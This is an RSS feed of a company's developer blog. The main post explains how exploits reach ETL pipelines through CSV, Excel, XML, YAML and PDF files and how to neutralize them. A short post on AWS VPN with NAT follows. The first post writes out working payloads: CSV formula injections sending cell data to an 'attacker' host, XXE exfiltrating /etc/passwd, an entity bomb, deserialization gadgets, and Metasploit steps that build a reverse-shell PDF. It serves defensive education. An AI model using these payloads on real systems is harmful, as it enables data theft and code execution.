<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Smarking</title>
    <description>The latest articles on DEV Community by Smarking (@smarkinginc).</description>
    <link>https://dev.to/smarkinginc</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F553741%2F73d2d6bf-7b4e-4dda-8d80-dd27ca67ea30.png</url>
      <title>DEV Community: Smarking</title>
      <link>https://dev.to/smarkinginc</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/smarkinginc"/>
    <language>en</language>
    <item>
      <title>Beware of Exploits in ETL</title>
      <dc:creator>Smarking</dc:creator>
      <pubDate>Tue, 27 Apr 2021 18:17:00 +0000</pubDate>
      <link>https://dev.to/smarkinginc/exploits-in-data-files-2o9d</link>
      <guid>https://dev.to/smarkinginc/exploits-in-data-files-2o9d</guid>
      <description>&lt;h1&gt;
  
  
  Exploits in Data Files
&lt;/h1&gt;

&lt;p&gt;At Smarking we receive data from third-party vendors. This data comes in various formats: XML, CSV, Excel, PDF, and JSON, and we use an Extract-Transform-Load (ETL) process to store the data in our database. This kind of ETL process is used by many organizations that ingest data from external sources. What are the security considerations pertaining to this process?&lt;/p&gt;

&lt;p&gt;The security issue is that a third party may unintentionally provide data laden with exploits. This can happen if the third party accumulates but does not filter free-form data submitted by users. Such data may include names, street addresses or free-form descriptions. The exploits would be innocuous at rest but would weaponize once data is extracted for manual viewing. &lt;/p&gt;

&lt;p&gt;For instance, if a cell in a CSV file starts with an equal sign &lt;code&gt;=&lt;/code&gt; then Excel would interpret the cell as a formula to be executed. For instance, consider this CSV:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Date,First Name,Last Name
2020-07-25,John,Smith
2020-07-25,Marry,Poppins
2020-07-25,"=2+5", Math
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Unfortunately, quotes around the cell value do not help to neutralize this effect. Both the Apple Numbers and Microsoft Excel apps would render the rogue cell as "7," despite the quoted &lt;code&gt;"=2+5"&lt;/code&gt;. In addition, the following characters can trigger formula evaluation: &lt;code&gt;+, -, @&lt;/code&gt;. The rendered table would look like this:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;First Name&lt;/th&gt;
&lt;th&gt;Last Name&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;2020-07-25&lt;/td&gt;
&lt;td&gt;John&lt;/td&gt;
&lt;td&gt;Smith&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2020-07-25&lt;/td&gt;
&lt;td&gt;Marry&lt;/td&gt;
&lt;td&gt;Poppins&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2020-07-25&lt;/td&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Math&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The formulas also allow running external commands in the underlying operating system. For example, each of these CSV lines would trigger opening an external calculator program &lt;code&gt;calc.exe&lt;/code&gt;,&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;...,=DDE("cmd";"/C calc";"__DdeLink_60_870516294"),...
...,=cmd|' /C calc'!A0,...
...,"=2+5+cmd|' /C calc'!A0",...
...,@SUM(cmd|'/c calc' !A0),...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;There would be warnings from Excel before running external commands, but attackers rely on users' &lt;em&gt;tendency to ignore security warnings in files downloaded from trusted sources.&lt;/em&gt; &lt;/p&gt;

&lt;p&gt;Special functions that create hyperlinks allow attackers to steal data from a CSV file. If a CSV file contains the following value in a cell, then upon opening it in Excel a user would see a link with the text "Error: please click for further information" in the corresponding cell inside the app.  Upon clicking the link, he would submit the contents of cells &lt;code&gt;A10&lt;/code&gt; and &lt;code&gt;A11&lt;/code&gt; to the attacker. Those cells may contain sensitive information, such as payment details.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;...,=HYPERLINK("http://attacker?leak="&amp;amp;A10&amp;amp;A11,"Error: please click for further information"),...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Neither Google Sheets web app is immune from such attacks. For instance, the &lt;code&gt;IMPORTXML(url, xpath)&lt;/code&gt; function (documentation &lt;a href="https://support.google.com/docs/answer/3093340"&gt;here&lt;/a&gt; ) would fetch data from the provided URL and insert it into the current sheet. Consider what would happen when importing the following CSV into Google Docs,&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;...,"=IMPORTXML(CONCAT(""http://attacker?v="", CONCATENATE(A2:E2)), ""//a"")",...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The result would be that data in the 2nd row of the spreadsheet spanning cells &lt;code&gt;A2&lt;/code&gt; through &lt;code&gt;E2&lt;/code&gt; would be submitted to the attacker. &lt;/p&gt;

&lt;p&gt;But it gets worse.  The URL could also be &lt;em&gt;another&lt;/em&gt; spreadsheet in your account. By using this technique twice the attacker can exfiltrate data from any other spreadsheet in your Google Docs account if he knows its URL. &lt;/p&gt;

&lt;p&gt;A suggested workaround for these attacks is to prefix each of the special characters &lt;code&gt;=,+,-,@&lt;/code&gt; in the CSV with a tab character. This neutralizes the attacks when viewing the data in Excel and other spreadsheet apps, however, note that the data is no longer in its original form.&lt;/p&gt;

&lt;p&gt;Also, PDF files are widely used to export reports from administrative websites. If you use libraries like &lt;code&gt;tabula-py&lt;/code&gt; to extract CSVs from such PDFs, then the extracted data can have exploits mentioned earlier. &lt;/p&gt;

&lt;h2&gt;
  
  
  Full control of data file generation
&lt;/h2&gt;

&lt;p&gt;So far we have looked at the situation in which data contains latent exploits in a regular data file. However, if an attacker can manufacture a data file in full, then he can do far more damage. The challenge for him, however, is to deliver such a file to the victim. &lt;/p&gt;

&lt;p&gt;If you receive data files from third parties, then a failure to authenticate the sender makes you subject to fishing attacks. If you are receiving data files by email, you may be getting them from an impostor. If you are receiving files by submission to your API, ensure that the third party is using an authentication token. If you are downloading data from a third party, verify its SSL certificate even if the third party is using a self-signed one. (On tips on how to do that read our earlier Smarking blog post.)&lt;/p&gt;

&lt;p&gt;The attacker can also gain control of the data file generation code. This can be accomplished by poisoning public code repositories. The simplest of such attacks is publishing a misspelled variants of popular packages hoping that users would install them by accident. For instance, In 2018 a &lt;a href="https://medium.com/@bertusk/detecting-cyber-attacks-in-the-python-package-index-pypi-61ab2b585c67"&gt;researcher&lt;/a&gt; found a malicious package 'dajngo' in the Python's PyPi repository which is an intentional misspelling of the popular package 'django.' &lt;/p&gt;

&lt;p&gt;By infecting generated data files rather than the system hosting malicious code the attacker delays detection. A malicious data file can introduce a discrepancy into ETL which may be manually reviewed only weeks later. The malicious data file would be downloaded and opened by the victim, thereby infecting his system. Thus, API exploits can infect hundreds if not thousands of API consumers until the issue is identified at the API source. Each infection could open a reverse tunnel to the attacker creating a pivot for further network infiltration. &lt;/p&gt;

&lt;h3&gt;
  
  
  Excel files
&lt;/h3&gt;

&lt;p&gt;Much like CSV files, Excel files are subject to formula-based exploits. But in addition to that, attackers can do more tricks with an Excel file. A single Excel file can encode multiple worksheets some of which may be hidden. Excel files can also specify font size and font color for particular cells and this feature can be used to hide values by using a white font. The cells have a specific data type associated with them. &lt;/p&gt;

&lt;p&gt;Starting from version 4.0 of Excel has support for new kinds of macros. While standard formulas are limited to workbook-related calculations, the new XL4 macros allow extensive, Turing-complete, programming. In order to work, they must reside on a macro-enabled sheet. &lt;/p&gt;

&lt;p&gt;There are other behaviour differences between a CSV and an Excel file. An Excel file would automatically open in the Excel app when double-clicked, but CSV files would open in the default spreadsheet app on the user's system (The "Numbers" app on a Mac). Excel files may also be from an older version of Excel in which case the installed Excel app would attempt to import them. This variety of behaviors creates a larger attack surface for Excel data files than for CSV files.&lt;/p&gt;

&lt;p&gt;Security at VMware surveyed XL4 exploits in the wild and presented a &lt;a href="https://vblocalhost.com/uploads/VB2020-61.pdf"&gt;report&lt;/a&gt; in November of 2020. They demonstrate how the macros can be used to download files from the internet, to execute PowerShell scripts, and change the Windows registry.&lt;/p&gt;

&lt;p&gt;The XL4 macro sequence begins to run from a cell immediately under a cell labeled &lt;code&gt;Auto_Open&lt;/code&gt; and descends lower and lower until there are no more cells with commands.  A &lt;code&gt;=GOTO&lt;/code&gt; statement can direct the program flow to any cell. Combined with &lt;code&gt;FORMULA.FILL&lt;/code&gt; which can write any value into a cell (including an &lt;code&gt;=&lt;/code&gt; command), the &lt;code&gt;GOTO&lt;/code&gt; can be directed to jump to a dynamic location. This allows you to implement flow control such as loops and &lt;code&gt;if&lt;/code&gt; statements, making the attacker's script Turing complete. &lt;/p&gt;

&lt;p&gt;The attackers can obfuscate their code so that it does not look like a program. The &lt;code&gt;GOTO&lt;/code&gt; jumping function can be used to obfuscate code by scattering it all over the spreadsheet, including cells not in view. White font can make the cells appear blank. Dynamic code can be generated at run-time by deobfuscating data in cells and converting them into code. Code can also be downloaded from the Internet at runtime, then pasted into a temporary cell and executed. &lt;/p&gt;

&lt;p&gt;As stated earlier, in order for the XL4 macros to work they must reside on a macro-enabled sheet. Security measures are already in place to alert about the presence of such sheets. However, an attacker can prepare an Excel file without the macro designation, and try to trick the user to manually enable it. For instance, this kind of Excel document was observed in the wild:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--d00F-YM2--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pwwldkcl82ohqoe1eoag.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--d00F-YM2--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pwwldkcl82ohqoe1eoag.png" alt="fishing page"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  XML, JSON and YAML
&lt;/h3&gt;

&lt;p&gt;XML files can be exploited using Processing Instructions (PI). These are instructions like &lt;code&gt;&amp;lt;!DOCTYPE html&amp;gt;&lt;/code&gt; which can cause XML parsers to load files from the file system and to generate HTTP requests. For instance, the following XML file instructs to load a local file and insert it into its own body:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;!DOCTYPE external [
&amp;lt;!ENTITY ee SYSTEM "file:///PATH/TO/simple.xml"&amp;gt;
]&amp;gt;
&amp;lt;root&amp;gt;&amp;amp;ee;&amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If the attacker could trigger an error that is reported back to him by the XML parser, then the contents of the file might be included in the error message thereby leaking data to the attacker. Modifying the URL to &lt;code&gt;http://example.com/foo.xml&lt;/code&gt; protocol would load a remote file from the Internet. &lt;/p&gt;

&lt;p&gt;Using these techniques an attacker could steal data or perform a Server-side Request Forgery (SSRF) attack to bypass firewalls. The following XML and DTD combination sends the contents of &lt;code&gt;/etc/passwd&lt;/code&gt; file to the attacker:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="utf-8"?&amp;gt;
&amp;lt;!DOCTYPE root [
 &amp;lt;!ENTITY % file SYSTEM "file:///etc/passwd"&amp;gt;
 &amp;lt;!ENTITY % dtd SYSTEM "http://attacker/evil.dtd"&amp;gt;
 %dtd;
]&amp;gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;where &lt;code&gt;evil.dtd&lt;/code&gt; file is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
&amp;lt;!ENTITY % all "&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;"&amp;gt;
%all;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The attacker can also cause a Denial of Service attack by loading a large file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;?xml version="1.0"?&amp;gt;
&amp;lt;!DOCTYPE root [
 &amp;lt;!ENTITY file SYSTEM "http://attacker/huge.xml" &amp;gt;
]&amp;gt;
&amp;lt;root&amp;gt;&amp;amp;file;&amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Entity expansions can be used to occupy gigabytes of memory using a short XML document. The following scheme would expand to occupy an exponentially large amount of memory relative to the number of lines used,&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;!DOCTYPE xmlbomb [
&amp;lt;!ENTITY a "1234567890" &amp;gt;
&amp;lt;!ENTITY b "&amp;amp;a;&amp;amp;a;&amp;amp;a;&amp;amp;a;&amp;amp;a;&amp;amp;a;&amp;amp;a;&amp;amp;a;"&amp;gt;
&amp;lt;!ENTITY c "&amp;amp;b;&amp;amp;b;&amp;amp;b;&amp;amp;b;&amp;amp;b;&amp;amp;b;&amp;amp;b;&amp;amp;b;"&amp;gt;
&amp;lt;!ENTITY d "&amp;amp;c;&amp;amp;c;&amp;amp;c;&amp;amp;c;&amp;amp;c;&amp;amp;c;&amp;amp;c;&amp;amp;c;"&amp;gt;
]&amp;gt;
&amp;lt;bomb&amp;gt;&amp;amp;d;&amp;lt;/bomb&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Many XML processing libraries can parse &lt;code&gt;gzip&lt;/code&gt; compressed streams. Some of these libraries are also vulnerable to compression bombs (1GB of zeros can be compressed to a 1MB data stream).&lt;/p&gt;

&lt;p&gt;In addition, XML parses have vulnerabilities that are triggered by malformed XML documents.  For instance, a large amount of unclosed nested tags XML tags as shown below would exhaust the computer's resources.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;A1&amp;gt;
 &amp;lt;A2&amp;gt;
  &amp;lt;A3&amp;gt;
   ...
    &amp;lt;A30000&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Unfortunately XML libraries across various languages do not handle such attacks. The Python &lt;code&gt;lxml&lt;/code&gt; library would dutifully load a local file from the filesystem and the &lt;code&gt;xmlrpc&lt;/code&gt; library would be subject to the memory blowup attack.  However, there are specialized libraries such as  &lt;a href="https://pypi.org/project/defusedxml/"&gt;DefusedXML&lt;/a&gt; that correctly handle such attacks. Use these libraries when working with untrusted data.&lt;/p&gt;

&lt;p&gt;If you are writing an XML parser yourself, use the following guidelines to limit the attack surface: limit parse depth, limit parse time, skip DTDs, and do not expand entities. Also,  do not run XPath expressions from untrusted sources and do not apply XLS transformations received from untrusted sources.&lt;/p&gt;

&lt;p&gt;Many API interfaces expect and return data in JSON or XML formats which contain records as key-value maps. The records are then stored in a database that many records. Whenever the records are exported from the database into a CSV report for analysis, the resulting files would lead to attacks that we have already seen.&lt;/p&gt;

&lt;p&gt;Rogue content can get into JSON and XML through an &lt;a href="https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.json_injection#Golang"&gt;injection attack&lt;/a&gt;. This attack is similar to the familiar SQL injection but it operates on JSON and XML.  The following would be an unsafe way to build a JSON document containing a password:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;json = `{..., "password":"${password}"}`
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That is because a password can have quotes, commas, and colons inside it, arranged to generate new keys in the resulting JSON. Instead, use a library that would properly escape values. &lt;/p&gt;

&lt;p&gt;Many languages have libraries to save or serialize objects in JSON, XML, and Yaml files and then to restore them later in a process called "deserialization." By design, this means that data files would embed names of objects' types and objects' states. Thus, if an attacker could cause deserialization of rogue data, then he would gain remote code execution.  For instance, loading the following YAML file with Python's &lt;code&gt;yaml.load(filename)&lt;/code&gt; would create a new object of type &lt;code&gt;Foo&lt;/code&gt; with name parameter "bar."&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;!!python/object:__main__.Foo {name: Bar}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Python's Yaml library is one of many data loaders which has a secondary ability to deserialize objects. A study in 2017 [Bechler] cataloged dozens of Java libraries vulnerable to such deserialization attacks. The study reported that if the following file is parsed by Java's &lt;code&gt;XMLDecoder&lt;/code&gt;  decoder, then it would create the attacker's specified object and call a method on it. In the following example, it would run an external command &lt;code&gt;/usr/bin/gedit&lt;/code&gt; using method &lt;code&gt;start&lt;/code&gt; of the &lt;code&gt;ProcessBuilder&lt;/code&gt; object which would first be created.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;new class="java.lang.ProcessBuilder"&amp;gt;
  &amp;lt;string &amp;gt;/usr/bin/gedit &amp;lt;/string&amp;gt; &amp;lt;method name="start" /&amp;gt;
&amp;lt;/new &amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Also, the same study showed that a vulnerablity in Apache Camel's SnakeYAML library (CVE-2017-3159) allowed an attacker to run arbitrary scripts inside Java's &lt;code&gt;ScriptEngine&lt;/code&gt; object:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="kt"&gt;!!&lt;/span&gt; &lt;span class="s"&gt;javax . script . ScriptEngineManager [&lt;/span&gt;
  &lt;span class="s"&gt;!! java . net . URLClassLoader [[&lt;/span&gt;
    &lt;span class="s"&gt;!! java . net . URL [" http :// attacker /"]&lt;/span&gt;
  &lt;span class="s"&gt;]]&lt;/span&gt;
&lt;span class="err"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  PDF Files
&lt;/h3&gt;

&lt;p&gt;Much like MS Office files, PDF files are notorious delivery vehicles for exploits.  For instance, last September a use-after-free bug was discovered in a cache data structure used by Adobe Reader. It lead to a code execution exploit CVE-2020-9715.&lt;/p&gt;

&lt;p&gt;PDF files have a large attack surface. They contain JavaScript in order to power PDF-based forms.  Also, the PDF standard allows embedding arbitrary &lt;a href="https://helpx.adobe.com/ca/acrobat/using/links-attachments-pdfs.html#add_an_attachment"&gt;file attachments&lt;/a&gt;, making a PDF document equivalent to an uncompressed "zip" file. Using such attachments the attacker can easily embed exploit payloads inside the PDF and then extract them using a small amount of embedded JavaScript. For instance, the &lt;a href="https://6point6.co.uk/insights/abusing-pdf-files/"&gt;CVE-2018-8414&lt;/a&gt; exploit used this technique to embed XML files into a PDF. &lt;/p&gt;

&lt;p&gt;It is simple to add embed files inside a PDF.  The following command appends an attachment &lt;code&gt;data.bin&lt;/code&gt; containing raw binary data to page 27 of a PDF document,&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ pdftk manual.pdf attach_files data.bin to_page 27 output manual_plus.pdf
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For security reasons, modern PDF readers do not automatically execute embedded JavaScript scripts. But in 2010 a security researcher Didier Stevens &lt;a href="https://blog.didierstevens.com/2010/03/29/escape-from-pdf/"&gt;found&lt;/a&gt; that it is possible launch an external program with &lt;code&gt;/Launch /Action&lt;/code&gt; command sequence to gain code execution in the host operating system.  Acrobat Reader showed a warning but Didier found a way to alter the message text in order to trick users to ignore it. &lt;/p&gt;

&lt;p&gt;You can replicate Didier's technique using Metasploit, a security researcher's tool which attackers also use. Didier's technique was implemented as Metasploit module &lt;code&gt;adobe_pdf_embedded_exe_nojs&lt;/code&gt;, whose documentation states:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;This module embeds a Metasploit payload into an existing PDF file in a non-standard method. The resulting PDF can be sent to a target as part of a social engineering attack. [It] does not require JavaScript to be enabled and ... [the] EXE is embedded in the PDF in a non-standard method using HEX encoding.  Target: Adobe Reader &amp;lt;= v9.3.3 (Windows XP SP3 English)&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Although this particular exploit is non-viable for current versions of PDF readers, the approach can be reused in future exploits.  In addition, Metasploit has other PDF exploits:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;gt; search type:exploit platform:windows name:pdf
... exploit/windows/fileformat/foxit_reader_uaf   ...   2018-04-20
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A possible defense from PDF exploits is to preprocess all untrusted PDF files and strip everything but the static content inside the PDF.  This can be accomplished with the following GhostScript command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ gs -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOUTPUTFILE=clean.pdf original.pdf
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Note that any copyable text inside the PDF would not be by made uncopyable. A discussion on StackOverflow &lt;a href="https://security.stackexchange.com/questions/103323/effectiveness-of-flattening-a-pdf-to-remove-malware"&gt;suggests&lt;/a&gt; adding options to downsample any embedded images to remove exploits that utilize flaws in image processing libraries. &lt;/p&gt;

&lt;p&gt;A simple text search inside the PDF file would not find all suspicious active components because attackers obfuscate them. Instead, one can use Didier's tool &lt;code&gt;pdfid&lt;/code&gt; to triage PDF documents and to analyze the suspicious ones with his &lt;code&gt;pdf-parser&lt;/code&gt; tool.  &lt;/p&gt;

&lt;p&gt;The following example shows how to generate a malicious PDF and then neutralize it:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ msfconsole
msf6 &amp;gt; use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe_nojs) &amp;gt; set lhost 1.2.3.4
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe_nojs) &amp;gt; set filename malicious.pdf
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe_nojs) &amp;gt; exploit
...
$ gs -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOUTPUTFILE=clean.pdf malicious.pdf
$ python pdfid.py malicious.pdf &amp;gt; malicious.txt
$ python pdfid.py clean.pdf &amp;gt; clean.txt
$ diff --width 80 --side-by-side malicious.txt clean.txt
PDFiD 0.2.7 malicious.pdf             | PDFiD 0.2.7 clean.pdf
 PDF Header: %PDF-1.5                 |  PDF Header: %PDF-1.7
 obj                    5             |  obj                    7
 endobj                 5             |  endobj                 7
 stream                 0             |  stream                 2
 endstream              0             |  endstream              1
 xref                   1                xref                   1
 trailer                1                trailer                1
 startxref              1                startxref              1
 /Page                  1(1)          |  /Page                  1
 /Encrypt               0                /Encrypt               0
 /ObjStm                0                /ObjStm                0
 /JS                    0                /JS                    0
 /JavaScript            0                /JavaScript            0
 /AA                    0                /AA                    0
 /OpenAction            1(1)          |  /OpenAction            0
 /AcroForm              0                /AcroForm              0
 /JBIG2Decode           0                /JBIG2Decode           0
 /RichMedia             0                /RichMedia             0
 /Launch                1(1)          |  /Launch                0
 /EmbeddedFile          0                /EmbeddedFile          0
 /XFA                   0                /XFA                   0
 /Colors &amp;gt; 2^24         0                /Colors &amp;gt; 2^24         0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Final Thoughts
&lt;/h2&gt;

&lt;p&gt;We have seen that the attack surface of data processing libraries differs from the attack surface of data viewing applications. There is a fundamental difference between data for machines and data for people. We have also seen that if the attacker can fully control the data file creation, then he can cause much more damage.&lt;/p&gt;

&lt;p&gt;When working with data received from a third party it is not known how well the third party checks data submitted by its users. The first step to protect yourself from exploits is to drop superfluous elements from a third party's data during the transformation stage of the ETL process. For instance, if fields titled "Description" and "Street Address" are not needed, then they can be filtered out on import.&lt;/p&gt;

&lt;p&gt;Filter out unnecessary characters from fields. A street address does not need to have &lt;code&gt;=, +, @&lt;/code&gt; characters, and most data values never need to &lt;em&gt;begin&lt;/em&gt; with those characters. When exporting data from your own database into CSV and PDF reports for manual viewing, simplify the data by removing all unusual characters since the report need not have data in the precise original form. &lt;/p&gt;

&lt;p&gt;Anonymize datasets to remove Personal Identifiable Information (PII). This further reduces the attack surface because any user-submitted values are replaced by anonymized equivalents.&lt;/p&gt;

&lt;p&gt;Finally, use Virtual Machines when opening unsafe files.  Virtual Box or remote instances on Amazon AWS can be used for working with unsafe data files.  As of 2021, AWS supports both Windows and Mac OS virtual workstations. Running ETL jobs in Docker also helps prevent any exploits from escaping into the underlying operating system. &lt;/p&gt;

&lt;p&gt;At Smarking, we injest millions of records from parking vendors and we use such techniques to fend off exploits.  &lt;/p&gt;

&lt;h2&gt;
  
  
  Additional Reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;[Mauer] "The Absurdly Underestimated Dangers of CSV Injection," George Mauer, 2017 (&lt;a href="http://georgemauer.net/2017/10/07/csv-injection.html"&gt;link&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;p&gt;OWASP "XML Security Cheat Sheet" (&lt;a href="https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html"&gt;link&lt;/a&gt;)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;[Bechler] "Java Unmarshaller Security: Turning your data into code execution", Moritz Bechler, 2017  &lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
    </item>
    <item>
      <title>AWS Site-to-Site VPN with NAT
</title>
      <dc:creator>Smarking</dc:creator>
      <pubDate>Fri, 22 Jan 2021 05:18:28 +0000</pubDate>
      <link>https://dev.to/smarkinginc/aws-site-to-site-vpn-with-nat-3if</link>
      <guid>https://dev.to/smarkinginc/aws-site-to-site-vpn-with-nat-3if</guid>
      <description>&lt;p&gt;At Smarking, we use the Amazon Web Services (AWS) infrastructure. We help organizations improve the efficiency of parking lots, and to do that we need to communicate with their computing systems. However, these organizations, which include hospitals and universities, often run closed private networks. Outside vendors like us may access those networks only through an IPSec-based VPN.&lt;/p&gt;

&lt;p&gt;Is it possible to create an IPsec tunnel from an AWS Virtual Private Cloud (VPC) to a network outside of AWS?  The use case that AWS supports well is connecting your &lt;em&gt;own&lt;/em&gt; on-premises network with the VPC. Thus, in naming components, AWS uses the term "Customer Network" to designate your on-premises network. You are the &lt;em&gt;customer&lt;/em&gt; of AWS. &lt;/p&gt;

&lt;p&gt;Also, because you are the administrator of your on-premises network, AWS does not expose extensive logs that would allow you to troubleshoot the establishment of the IPSec tunnel. Instead, AWS assumes that you would be able to inspect the logs on the side of the on-premises network. &lt;/p&gt;

&lt;p&gt;But what if you wished to create an IPSec tunnel from your VPC to a third party network, one which is beyond your administrative control? In particular, you may not control the CIDR policy of the third party network. A third party may require that you place your network on a specific CIDR, or that you use publicly addressable IP addresses.&lt;/p&gt;

&lt;p&gt;In order to support creating IPSec tunnels, AWS offered, for many years, a specialized solution called a Virtual Private Network (VPN). In recent years, it supplemented it with a generic solution called a Transit Gateway (TGW). The VPN solution requires that the customer's network doesn't conflict with your CIDR. Unless you are willing to change the IP addresses inside your VPC to match the requirement, then you need to use Network Address Translation (NAT). This can be accomplished by creative use of the Transit Gateway (TGW). &lt;/p&gt;

&lt;p&gt;Below is the network layout that illustrates the key idea. Assume that the AWS VPC has the subnet &lt;code&gt;20.0.0.0/16&lt;/code&gt;, the customer's network is on the &lt;code&gt;172.31.0.0/16&lt;/code&gt; subnet, and that the customer wants us to use a public IP subnet. (We use AWS' terminology of "customer" to refer to a third party.) But, instead of using a public IP subnet, we will use NAT to map all EC2 instances to the single Elastic public IP &lt;code&gt;1.2.3.4&lt;/code&gt;. &lt;/p&gt;

